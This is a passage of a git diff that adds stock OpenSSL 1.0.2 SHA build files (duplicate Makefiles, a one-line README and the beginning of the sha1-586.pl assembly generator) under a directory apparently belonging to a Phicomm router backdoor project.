+sha256.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+sha256.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+sha256.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+sha256.o: ../../include/openssl/symhacks.h ../md32_common.h sha256.c
+sha512.o: ../../e_os.h ../../include/openssl/bio.h
+sha512.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+sha512.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+sha512.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+sha512.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+sha512.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+sha512.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+sha512.o: ../cryptlib.h sha512.c
+sha_dgst.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+sha_dgst.o: ../../include/openssl/opensslconf.h
+sha_dgst.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+sha_dgst.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+sha_dgst.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+sha_dgst.o: ../md32_common.h sha_dgst.c sha_locl.h
+sha_one.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+sha_one.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+sha_one.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+sha_one.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+sha_one.o: ../../include/openssl/symhacks.h sha_one.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/Makefile.bak b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/Makefile.bak
new file mode 100644
index 0000000..a8c0cf7
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/Makefile.bak
@@ -0,0 +1,175 @@
+#
+# OpenSSL/crypto/sha/Makefile
+#
+
+DIR=    sha
+TOP=    ../..
+CC=     cc
+CPP=    $(CC) -E
+INCLUDES=
+CFLAG=-g
+MAKEFILE=       Makefile
+AR=             ar r
+
+SHA1_ASM_OBJ=
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+ASFLAGS= $(INCLUDES) $(ASFLAG)
+AFLAGS= $(ASFLAGS)
+
+GENERAL=Makefile
+TEST=shatest.c sha1test.c sha256t.c sha512t.c
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=sha_dgst.c sha1dgst.c sha_one.c sha1_one.c sha256.c sha512.c
+LIBOBJ=sha_dgst.o sha1dgst.o sha_one.o sha1_one.o sha256.o sha512.o $(SHA1_ASM_OBJ)
+
+SRC= $(LIBSRC)
+
+EXHEADER= sha.h
+HEADER= sha_locl.h $(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:    lib
+
+lib:    $(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+sha1-586.s:	asm/sha1-586.pl ../perlasm/x86asm.pl
+	$(PERL) asm/sha1-586.pl $(PERLASM_SCHEME) $(CFLAGS) $(PROCESSOR) > $@
+sha256-586.s:	asm/sha256-586.pl ../perlasm/x86asm.pl
+	$(PERL) asm/sha256-586.pl $(PERLASM_SCHEME) $(CFLAGS) $(PROCESSOR) > $@
+sha512-586.s:	asm/sha512-586.pl ../perlasm/x86asm.pl
+	$(PERL) asm/sha512-586.pl $(PERLASM_SCHEME) $(CFLAGS) $(PROCESSOR) > $@
+
+sha1-ia64.s:   asm/sha1-ia64.pl
+	(cd asm; $(PERL) sha1-ia64.pl ../$@ $(CFLAGS))
+sha256-ia64.s: asm/sha512-ia64.pl
+	(cd asm; $(PERL) sha512-ia64.pl ../$@ $(CFLAGS))
+sha512-ia64.s: asm/sha512-ia64.pl
+	(cd asm; $(PERL) sha512-ia64.pl ../$@ $(CFLAGS))
+
+sha256-armv4.S: asm/sha256-armv4.pl
+	$(PERL) $< $(PERLASM_SCHEME) $@
+
+sha1-alpha.s:	asm/sha1-alpha.pl
+	(preproc=$$$$.$@.S; trap "rm $$preproc" INT; \
+	$(PERL) asm/sha1-alpha.pl > $$preproc && \
+	$(CC) -E -P $$preproc > $@ && rm $$preproc)
+
+# Solaris make has to be explicitly told
+sha1-x86_64.s:	asm/sha1-x86_64.pl;	$(PERL) asm/sha1-x86_64.pl $(PERLASM_SCHEME) > $@
+sha1-mb-x86_64.s:	asm/sha1-mb-x86_64.pl;	$(PERL) asm/sha1-mb-x86_64.pl $(PERLASM_SCHEME) > $@
+sha256-x86_64.s:asm/sha512-x86_64.pl;	$(PERL) asm/sha512-x86_64.pl $(PERLASM_SCHEME) $@
+sha256-mb-x86_64.s:	asm/sha256-mb-x86_64.pl;	$(PERL) asm/sha256-mb-x86_64.pl $(PERLASM_SCHEME) > $@
+sha512-x86_64.s:asm/sha512-x86_64.pl;	$(PERL) asm/sha512-x86_64.pl $(PERLASM_SCHEME) $@
+sha1-sparcv9.S:	asm/sha1-sparcv9.pl;	$(PERL) asm/sha1-sparcv9.pl $@ $(CFLAGS)
+sha256-sparcv9.S:asm/sha512-sparcv9.pl;	$(PERL) asm/sha512-sparcv9.pl $@ $(CFLAGS)
+sha512-sparcv9.S:asm/sha512-sparcv9.pl;	$(PERL) asm/sha512-sparcv9.pl $@ $(CFLAGS)
+
+sha1-ppc.s:	asm/sha1-ppc.pl;	$(PERL) asm/sha1-ppc.pl $(PERLASM_SCHEME) $@
+sha256-ppc.s:	asm/sha512-ppc.pl;	$(PERL) asm/sha512-ppc.pl $(PERLASM_SCHEME) $@
+sha512-ppc.s:	asm/sha512-ppc.pl;	$(PERL) asm/sha512-ppc.pl $(PERLASM_SCHEME) $@
+sha256p8-ppc.s:	asm/sha512p8-ppc.pl;	$(PERL) asm/sha512p8-ppc.pl $(PERLASM_SCHEME) $@
+sha512p8-ppc.s:	asm/sha512p8-ppc.pl;	$(PERL) asm/sha512p8-ppc.pl $(PERLASM_SCHEME) $@
+
+sha1-parisc.s:	asm/sha1-parisc.pl;	$(PERL) asm/sha1-parisc.pl $(PERLASM_SCHEME) $@
+sha256-parisc.s:asm/sha512-parisc.pl;	$(PERL) asm/sha512-parisc.pl $(PERLASM_SCHEME) $@
+sha512-parisc.s:asm/sha512-parisc.pl;	$(PERL) asm/sha512-parisc.pl $(PERLASM_SCHEME) $@
+
+sha1-mips.S:	asm/sha1-mips.pl;	$(PERL) asm/sha1-mips.pl $(PERLASM_SCHEME) $@
+sha256-mips.S:	asm/sha512-mips.pl;	$(PERL) asm/sha512-mips.pl $(PERLASM_SCHEME) $@
+sha512-mips.S:	asm/sha512-mips.pl;	$(PERL) asm/sha512-mips.pl $(PERLASM_SCHEME) $@
+
+# GNU make "catch all"
+sha1-%.S:	asm/sha1-%.pl;		$(PERL) $< $(PERLASM_SCHEME) $@
+sha256-%.S:	asm/sha512-%.pl;	$(PERL) $< $(PERLASM_SCHEME) $@
+sha512-%.S:	asm/sha512-%.pl;	$(PERL) $< $(PERLASM_SCHEME) $@
+
+sha1-armv4-large.o:	sha1-armv4-large.S
+sha256-armv4.o:		sha256-armv4.S
+sha512-armv4.o:		sha512-armv4.S
+sha1-armv8.o:		sha1-armv8.S
+sha256-armv8.o:		sha256-armv8.S
+sha512-armv8.o:		sha512-armv8.S
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.s *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+sha1_one.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+sha1_one.o: ../../include/openssl/opensslconf.h
+sha1_one.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+sha1_one.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+sha1_one.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+sha1_one.o: sha1_one.c
+sha1dgst.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+sha1dgst.o: ../../include/openssl/opensslconf.h
+sha1dgst.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+sha1dgst.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+sha1dgst.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+sha1dgst.o: ../md32_common.h sha1dgst.c sha_locl.h
+sha256.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+sha256.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+sha256.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+sha256.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+sha256.o: ../../include/openssl/symhacks.h ../md32_common.h sha256.c
+sha512.o: ../../e_os.h ../../include/openssl/bio.h
+sha512.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+sha512.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+sha512.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+sha512.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+sha512.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+sha512.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+sha512.o: ../cryptlib.h sha512.c
+sha_dgst.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+sha_dgst.o: ../../include/openssl/opensslconf.h
+sha_dgst.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+sha_dgst.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+sha_dgst.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+sha_dgst.o: ../md32_common.h sha_dgst.c sha_locl.h
+sha_one.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+sha_one.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+sha_one.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+sha_one.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+sha_one.o: ../../include/openssl/symhacks.h sha_one.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/Makefile.save b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/Makefile.save
new file mode 100644
index 0000000..a8c0cf7
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/Makefile.save
@@ -0,0 +1,175 @@
+#
+# OpenSSL/crypto/sha/Makefile
+#
+
+DIR=    sha
+TOP=    ../..
+CC=     cc
+CPP=    $(CC) -E
+INCLUDES=
+CFLAG=-g
+MAKEFILE=       Makefile
+AR=             ar r
+
+SHA1_ASM_OBJ=
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+ASFLAGS= $(INCLUDES) $(ASFLAG)
+AFLAGS= $(ASFLAGS)
+
+GENERAL=Makefile
+TEST=shatest.c sha1test.c sha256t.c sha512t.c
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=sha_dgst.c sha1dgst.c sha_one.c sha1_one.c sha256.c sha512.c
+LIBOBJ=sha_dgst.o sha1dgst.o sha_one.o sha1_one.o sha256.o sha512.o $(SHA1_ASM_OBJ)
+
+SRC= $(LIBSRC)
+
+EXHEADER= sha.h
+HEADER= sha_locl.h $(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:    lib
+
+lib:    $(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+sha1-586.s:	asm/sha1-586.pl ../perlasm/x86asm.pl
+	$(PERL) asm/sha1-586.pl $(PERLASM_SCHEME) $(CFLAGS) $(PROCESSOR) > $@
+sha256-586.s:	asm/sha256-586.pl ../perlasm/x86asm.pl
+	$(PERL) asm/sha256-586.pl $(PERLASM_SCHEME) $(CFLAGS) $(PROCESSOR) > $@
+sha512-586.s:	asm/sha512-586.pl ../perlasm/x86asm.pl
+	$(PERL) asm/sha512-586.pl $(PERLASM_SCHEME) $(CFLAGS) $(PROCESSOR) > $@
+
+sha1-ia64.s:   asm/sha1-ia64.pl
+	(cd asm; $(PERL) sha1-ia64.pl ../$@ $(CFLAGS))
+sha256-ia64.s: asm/sha512-ia64.pl
+	(cd asm; $(PERL) sha512-ia64.pl ../$@ $(CFLAGS))
+sha512-ia64.s: asm/sha512-ia64.pl
+	(cd asm; $(PERL) sha512-ia64.pl ../$@ $(CFLAGS))
+
+sha256-armv4.S: asm/sha256-armv4.pl
+	$(PERL) $< $(PERLASM_SCHEME) $@
+
+sha1-alpha.s:	asm/sha1-alpha.pl
+	(preproc=$$$$.$@.S; trap "rm $$preproc" INT; \
+	$(PERL) asm/sha1-alpha.pl > $$preproc && \
+	$(CC) -E -P $$preproc > $@ && rm $$preproc)
+
+# Solaris make has to be explicitly told
+sha1-x86_64.s:	asm/sha1-x86_64.pl;	$(PERL) asm/sha1-x86_64.pl $(PERLASM_SCHEME) > $@
+sha1-mb-x86_64.s:	asm/sha1-mb-x86_64.pl;	$(PERL) asm/sha1-mb-x86_64.pl $(PERLASM_SCHEME) > $@
+sha256-x86_64.s:asm/sha512-x86_64.pl;	$(PERL) asm/sha512-x86_64.pl $(PERLASM_SCHEME) $@
+sha256-mb-x86_64.s:	asm/sha256-mb-x86_64.pl;	$(PERL) asm/sha256-mb-x86_64.pl $(PERLASM_SCHEME) > $@
+sha512-x86_64.s:asm/sha512-x86_64.pl;	$(PERL) asm/sha512-x86_64.pl $(PERLASM_SCHEME) $@
+sha1-sparcv9.S:	asm/sha1-sparcv9.pl;	$(PERL) asm/sha1-sparcv9.pl $@ $(CFLAGS)
+sha256-sparcv9.S:asm/sha512-sparcv9.pl;	$(PERL) asm/sha512-sparcv9.pl $@ $(CFLAGS)
+sha512-sparcv9.S:asm/sha512-sparcv9.pl;	$(PERL) asm/sha512-sparcv9.pl $@ $(CFLAGS)
+
+sha1-ppc.s:	asm/sha1-ppc.pl;	$(PERL) asm/sha1-ppc.pl $(PERLASM_SCHEME) $@
+sha256-ppc.s:	asm/sha512-ppc.pl;	$(PERL) asm/sha512-ppc.pl $(PERLASM_SCHEME) $@
+sha512-ppc.s:	asm/sha512-ppc.pl;	$(PERL) asm/sha512-ppc.pl $(PERLASM_SCHEME) $@
+sha256p8-ppc.s:	asm/sha512p8-ppc.pl;	$(PERL) asm/sha512p8-ppc.pl $(PERLASM_SCHEME) $@
+sha512p8-ppc.s:	asm/sha512p8-ppc.pl;	$(PERL) asm/sha512p8-ppc.pl $(PERLASM_SCHEME) $@
+
+sha1-parisc.s:	asm/sha1-parisc.pl;	$(PERL) asm/sha1-parisc.pl $(PERLASM_SCHEME) $@
+sha256-parisc.s:asm/sha512-parisc.pl;	$(PERL) asm/sha512-parisc.pl $(PERLASM_SCHEME) $@
+sha512-parisc.s:asm/sha512-parisc.pl;	$(PERL) asm/sha512-parisc.pl $(PERLASM_SCHEME) $@
+
+sha1-mips.S:	asm/sha1-mips.pl;	$(PERL) asm/sha1-mips.pl $(PERLASM_SCHEME) $@
+sha256-mips.S:	asm/sha512-mips.pl;	$(PERL) asm/sha512-mips.pl $(PERLASM_SCHEME) $@
+sha512-mips.S:	asm/sha512-mips.pl;	$(PERL) asm/sha512-mips.pl $(PERLASM_SCHEME) $@
+
+# GNU make "catch all"
+sha1-%.S:	asm/sha1-%.pl;		$(PERL) $< $(PERLASM_SCHEME) $@
+sha256-%.S:	asm/sha512-%.pl;	$(PERL) $< $(PERLASM_SCHEME) $@
+sha512-%.S:	asm/sha512-%.pl;	$(PERL) $< $(PERLASM_SCHEME) $@
+
+sha1-armv4-large.o:	sha1-armv4-large.S
+sha256-armv4.o:		sha256-armv4.S
+sha512-armv4.o:		sha512-armv4.S
+sha1-armv8.o:		sha1-armv8.S
+sha256-armv8.o:		sha256-armv8.S
+sha512-armv8.o:		sha512-armv8.S
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.s *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+sha1_one.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+sha1_one.o: ../../include/openssl/opensslconf.h
+sha1_one.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+sha1_one.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+sha1_one.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+sha1_one.o: sha1_one.c
+sha1dgst.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+sha1dgst.o: ../../include/openssl/opensslconf.h
+sha1dgst.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+sha1dgst.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+sha1dgst.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+sha1dgst.o: ../md32_common.h sha1dgst.c sha_locl.h
+sha256.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+sha256.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+sha256.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+sha256.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+sha256.o: ../../include/openssl/symhacks.h ../md32_common.h sha256.c
+sha512.o: ../../e_os.h ../../include/openssl/bio.h
+sha512.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+sha512.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+sha512.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+sha512.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+sha512.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+sha512.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+sha512.o: ../cryptlib.h sha512.c
+sha_dgst.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+sha_dgst.o: ../../include/openssl/opensslconf.h
+sha_dgst.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+sha_dgst.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+sha_dgst.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+sha_dgst.o: ../md32_common.h sha_dgst.c sha_locl.h
+sha_one.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+sha_one.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+sha_one.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+sha_one.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+sha_one.o: ../../include/openssl/symhacks.h sha_one.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/asm/README b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/asm/README
new file mode 100644
index 0000000..b7e7557
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/asm/README
@@ -0,0 +1 @@
+C2.pl works
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/asm/sha1-586.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/asm/sha1-586.pl
new file mode 100644
index 0000000..8377299
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/asm/sha1-586.pl
@@ -0,0 +1,1476 @@
+#!/usr/bin/env perl
+
+# ====================================================================
+# [Re]written by Andy Polyakov <appro@openssl.org> for the OpenSSL
+# project. The module is, however, dual licensed under OpenSSL and
+# CRYPTOGAMS licenses depending on where you obtain it. For further
+# details see http://www.openssl.org/~appro/cryptogams/.
+# ====================================================================
+
+# "[Re]written" was achieved in two major overhauls. In 2004 BODY_*
+# functions were re-implemented to address P4 performance issue [see
+# commentary below], and in 2006 the rest was rewritten in order to
+# gain freedom to liberate licensing terms.
+
+# January, September 2004.
+#
+# It was noted that Intel IA-32 C compiler generates code which
+# performs ~30% *faster* on P4 CPU than original *hand-coded*
+# SHA1 assembler implementation. To address this problem (and
+# prove that humans are still better than machines:-), the
+# original code was overhauled, which resulted in following
+# performance changes:
+#
+#		compared with original	compared with Intel cc
+#		assembler impl.		generated code
+# Pentium	-16%			+48%
+# PIII/AMD	+8%			+16%
+# P4		+85%(!)			+45%
+#
+# As you can see Pentium came out as looser:-( Yet I reckoned that
+# improvement on P4 outweights the loss and incorporate this
+# re-tuned code to 0.9.7 and later.
+# ----------------------------------------------------------------
+#					<appro@fy.chalmers.se>
+
+# August 2009.
+#
+# George Spelvin has tipped that F_40_59(b,c,d) can be rewritten as
+# '(c&d) + (b&(c^d))', which allows to accumulate partial results
+# and lighten "pressure" on scratch registers. This resulted in
+# >12% performance improvement on contemporary AMD cores (with no
+# degradation on other CPUs:-). Also, the code was revised to maximize
+# "distance" between instructions producing input to 'lea' instruction
+# and the 'lea' instruction itself, which is essential for Intel Atom
+# core and resulted in ~15% improvement.
+
+# October 2010.
+#
+# Add SSSE3, Supplemental[!] SSE3, implementation. The idea behind it
+# is to offload message schedule denoted by Wt in NIST specification,
+# or Xupdate in OpenSSL source, to SIMD unit. The idea is not novel,
+# and in SSE2 context was first explored by Dean Gaudet in 2004, see
+# http://arctic.org/~dean/crypto/sha1.html. Since then several things
+# have changed that made it interesting again:
+#
+# a) XMM units became faster and wider;
+# b) instruction set became more versatile;
+# c) an important observation was made by Max Locktykhin, which made
+#    it possible to reduce amount of instructions required to perform
+#    the operation in question, for further details see
+#    http://software.intel.com/en-us/articles/improving-the-performance-of-the-secure-hash-algorithm-1/.
+
+# April 2011.
+#
+# Add AVX code path, probably most controversial... The thing is that
+# switch to AVX alone improves performance by as little as 4% in
+# comparison to SSSE3 code path. But below result doesn't look like
+# 4% improvement... Trouble is that Sandy Bridge decodes 'ro[rl]' as
+# pair of µ-ops, and it's the additional µ-ops, two per round, that
+# make it run slower than Core2 and Westmere. But 'sh[rl]d' is decoded
+# as single µ-op by Sandy Bridge and it's replacing 'ro[rl]' with
+# equivalent 'sh[rl]d' that is responsible for the impressive 5.1
+# cycles per processed byte. But 'sh[rl]d' is not something that used
+# to be fast, nor does it appear to be fast in upcoming Bulldozer
+# [according to its optimization manual]. Which is why AVX code path
+# is guarded by *both* AVX and synthetic bit denoting Intel CPUs.
+# One can argue that it's unfair to AMD, but without 'sh[rl]d' it
+# makes no sense to keep the AVX code path. If somebody feels that
+# strongly, it's probably more appropriate to discuss possibility of
+# using vector rotate XOP on AMD...
+
+# March 2014.
+#
+# Add support for Intel SHA Extensions.
+
+######################################################################
+# Current performance is summarized in following table. Numbers are
+# CPU clock cycles spent to process single byte (less is better).
+#
+#		x86		SSSE3		AVX
+# Pentium	15.7		-
+# PIII		11.5		-
+# P4		10.6		-
+# AMD K8	7.1		-
+# Core2		7.3		6.0/+22%	-
+# Westmere	7.3		5.5/+33%	-
+# Sandy Bridge	8.8		6.2/+40%	5.1(**)/+73%
+# Ivy Bridge	7.2		4.8/+51%	4.7(**)/+53%
+# Haswell	6.5		4.3/+51%	4.1(**)/+58%
+# Bulldozer	11.6		6.0/+92%
+# VIA Nano	10.6		7.5/+41%
+# Atom		12.5		9.3(*)/+35%
+# Silvermont	14.5		9.9(*)/+46%
+#
+# (*)	Loop is 1056 instructions long and expected result is ~8.25.
+#	The discrepancy is because of front-end limitations, so
+#	called MS-ROM penalties, and on Silvermont even rotate's
+#	limited parallelism.
+#
+# (**)	As per above comment, the result is for AVX *plus* sh[rl]d.
+
+$0 =~ m/(.*[\/\\])[^\/\\]+$/; $dir=$1;
+push(@INC,"${dir}","${dir}../../perlasm");
+require "x86asm.pl";
+
+&asm_init($ARGV[0],"sha1-586.pl",$ARGV[$#ARGV] eq "386");
+
+$xmm=$ymm=0;
+for (@ARGV) { $xmm=1 if (/-DOPENSSL_IA32_SSE2/); }
+
+$ymm=1 if ($xmm &&
+		`$ENV{CC} -Wa,-v -c -o /dev/null -x assembler /dev/null 2>&1`
+			=~ /GNU assembler version ([2-9]\.[0-9]+)/ &&
+		$1>=2.19);	# first version supporting AVX
+
+$ymm=1 if ($xmm && !$ymm && $ARGV[0] eq "win32n" && 
+		`nasm -v 2>&1` =~ /NASM version ([2-9]\.[0-9]+)/ &&
+		$1>=2.03);	# first version supporting AVX
+
+$ymm=1 if ($xmm && !$ymm && $ARGV[0] eq "win32" &&
+		`ml 2>&1` =~ /Version ([0-9]+)\./ &&
+		$1>=10);	# first version supporting AVX
+
+$ymm=1 if ($xmm && !$ymm && `$ENV{CC} -v 2>&1` =~ /(^clang version|based on LLVM) ([3-9]\.[0-9]+)/ &&
+		$2>=3.0);	# first version supporting AVX
+
+$shaext=$xmm;	### set to zero if compiling for 1.0.1
+
+&external_label("OPENSSL_ia32cap_P") if ($xmm);
+
+
+$A="eax";
+$B="ebx";
+$C="ecx";
+$D="edx";
+$E="edi";
+$T="esi";
+$tmp1="ebp";
+
+@V=($A,$B,$C,$D,$E,$T);
+
+$alt=0;	# 1 denotes alternative IALU implementation, which performs
+	# 8% *worse* on P4, same on Westmere and Atom, 2% better on
+	# Sandy Bridge...
+
+sub BODY_00_15
+	{
+	local($n,$a,$b,$c,$d,$e,$f)=@_;
+
+	&comment("00_15 $n");
+
+	&mov($f,$c);			# f to hold F_00_19(b,c,d)
+	 if ($n==0)  { &mov($tmp1,$a); }
+	 else        { &mov($a,$tmp1); }
+	&rotl($tmp1,5);			# tmp1=ROTATE(a,5)
+	 &xor($f,$d);
+	&add($tmp1,$e);			# tmp1+=e;
+	 &mov($e,&swtmp($n%16));	# e becomes volatile and is loaded
+	 				# with xi, also note that e becomes
+					# f in next round...
+	&and($f,$b);
+	&rotr($b,2);			# b=ROTATE(b,30)
+	 &xor($f,$d);			# f holds F_00_19(b,c,d)
+	&lea($tmp1,&DWP(0x5a827999,$tmp1,$e));	# tmp1+=K_00_19+xi
+
+	if ($n==15) { &mov($e,&swtmp(($n+1)%16));# pre-fetch f for next round
+		      &add($f,$tmp1); }	# f+=tmp1
+	else        { &add($tmp1,$f); }	# f becomes a in next round
+	&mov($tmp1,$a)			if ($alt && $n==15);
+	}
+
+sub BODY_16_19
+	{
+	local($n,$a,$b,$c,$d,$e,$f)=@_;
+
+	&comment("16_19 $n");
+
+if ($alt) {
+	&xor($c,$d);
+	 &xor($f,&swtmp(($n+2)%16));	# f to hold Xupdate(xi,xa,xb,xc,xd)
+	&and($tmp1,$c);			# tmp1 to hold F_00_19(b,c,d), b&=c^d
+	 &xor($f,&swtmp(($n+8)%16));
+	&xor($tmp1,$d);			# tmp1=F_00_19(b,c,d)
+	 &xor($f,&swtmp(($n+13)%16));	# f holds xa^xb^xc^xd
+	&rotl($f,1);			# f=ROTATE(f,1)
+	 &add($e,$tmp1);		# e+=F_00_19(b,c,d)
+	&xor($c,$d);			# restore $c
+	 &mov($tmp1,$a);		# b in next round
+	&rotr($b,$n==16?2:7);		# b=ROTATE(b,30)
